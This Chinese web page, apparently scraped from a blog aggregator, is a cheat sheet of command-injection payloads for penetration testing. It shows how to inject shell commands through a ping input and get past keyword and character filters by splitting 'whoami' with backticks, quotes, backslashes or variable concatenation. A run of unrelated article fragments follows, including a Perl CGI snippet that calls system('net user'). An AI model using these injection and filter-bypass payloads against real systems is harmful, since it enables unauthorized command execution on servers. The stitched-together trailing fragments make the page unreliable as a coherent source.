命令执行常用命令

在渗透测试过程中,会遇见一些关于命令执行的漏洞,下面是收集的一些常用命令:

;   <   >   <>  |   ||  &  &&   `` ()   ‘ ‘

假设一种场景,从前端接收ip比如:127.0.0.1,后端对该ip进行ping测试: ping 127.0.0.1

  1. 没有任何防护
  2. 过滤了|
  3. 过滤了 ; |
  4. 过滤了 ; | &
  5. 过滤了 whoami关键字
    ping -c 1 127.0.0.1|wh``oami
  6. 过滤了whoami ``
    ping -c 1 127.0.0.1|wh‘‘oami
  7. 过滤了whoami `` ‘‘
    ping -c 1 127.0.0.1;a=who;b=ami;$a$b
  8. 过滤了whoami `` ‘‘ $
    ping -c 1 127.0.0.1|whoam""i
  9. 过滤了whoami `` ‘‘ $ "" ;
    ping -c 1 127.0.0.1|whoam\i

原文地址:http://blog.51cto.com/13770310/2121065

时间: 2024-08-03 13:17:05

命令执行常用命令的相关文章

[Perforce系列—] 1. 使用Perforce 命令 与常用命令

前言 常见使用 p4 的方式就是使用Client 端,但是有的时候遇到这样的状况: 1. Client 端的操作方式的局限, 有些操作无法实现 (一般这样的状况不多) 2. 使用P4 和其他一些工具进行整合, 比如p4 整合自动部署 3. 使用代码的方式来使用p4, 比如使用Perl语言来与P4 进行交互 .... 以上的状况, 直接使用P4 Client 的话, 就没办法达成我们的要求了.这个时候自然就要使用到P4的命令行. 关于环境变量设置 Perforce的环境变量配置 下载安装完P4 之

传奇检测命令大全(常用命令)

传奇检测命令大全------常用命令-----#IF ;如果#SAY ;输出字符串#ACT ;执行命令break ;结束命令close ;结束对话------条件命令-----CHECKITEM 物品名 数量 ;检测当前人物所带物品及数量CHECKGOLD 数量 ;检测当前人物所带金币数量CHECKLEVELEX (>,<,=) 等级数 ;检测当前人物等级CHECKCREDITPOINT (>,<,=) 声望数 ;检测当前人物声望CHECKJOB (Warrior,Wizard,T

[源码]perl执行dos命令 执行cmd命令并输出cgi页面

perl执行dos命令 执行cmd命令并输出cgi页面 2014-08-31 01:30:13| 分类: Perl |举报 |字号 订阅 #!c:/Perl/bin/perl.exe print "Content-type: text/plain; charset=iso-8859-1\n\n"; print "k8team"; system('net user'); 原文地址:https://www.cnblogs.com/k8gege/p/10585702.ht

Laravel 命令行常用命令

一.简介 1.Artisan 是 Laravel 自带的命令行接口名称,它为我们在开发过程中提供了很多有用的命令.想要查看所有可用的Artisan命令,可使用list命令: php artisan list 2.每个命令都可以用help指令显示命令描述及命令参数和选项.想要查看帮助界面,只需要在命令前加上help就可以了: php artisan help migrate 3.运行命令时,需将php添加到系统环境变量中,并且将目录cd到Laravel项目的根目录下才有效. 二.常用命令 1.配置

adb常用命令+linux常用命令

1. 显示当前运行的全部模拟器:    adb devices 2. 安装应用程序:    adb install -r 123.apk 3. 获取模拟器中的文件:    adb pull <remote> <local> 4. 向模拟器中写文件:    adb push <local> <remote> 5. 进入模拟器的shell模式:    adb shell 6. 卸载apk包:      adb shell      cd data/app    

查看MySQL版本的命令及常用命令

Windows / Linux 系统 前提是已经正确安装了 MySQL,打开 Windows 系统中的命令行工具(Win + R --> 输入 cmd 并按下回车键)--> 输入命令: mysql -V; 直接打开 MySQL 客户端或在 cmd 命令行中登陆:mysql -u用户名 -p密码;,例如:mysql -uroot -p123456;,然后:show variables like '%version%'; 或者:status;,或者:\s; 或者:select version();

Cygwin下编译的程序不使用Cygwin.dll即可运行的命令 及常用命令简介

cc -mno-cygwin foo.c 1.$ ps PS的相关用法: QuoteUsage ps [-aefl] [-u uid]-f = show process uids, ppids-l = show process uids, ppids, pgids, winpids-u uid = list processes owned by uid-a, -e = show processes of all users-s = show process summary-W = show wi

阶段2 JavaWeb+黑马旅游网_15-Maven基础_第3节 maven标准目录结构和常用命令_07maven常用命令

以给的hellowordl的的代码为例. src/main/java下,这是主业务逻辑代码 里面的内容只有一个jsp的跳转 测试包下: 里面很简单的就输出了一句话 复制项目的目录 先cd进入复制的这个目录 然后输入d盘.这样就已经进去到羡慕的目录了 mvn clean 把target目录删掉. mvn complie complie是编译的意思. 生成 为了target文件夹 target目录 classes编译后的java文件存放的目录. 可以mvn complie是对main下的java代码

Linux 命令行常用命令

ctrl+u:剪切光标前面的所有字符 ctrl+k:剪切光标后面的所有字符 crtl+y:复制剪切的文字命令 crtl+e:光标移动到命令行末尾 crtl+a:光标移动到命令行行首 crtl+p:history命令行往上翻 crt+n:history命令行往下翻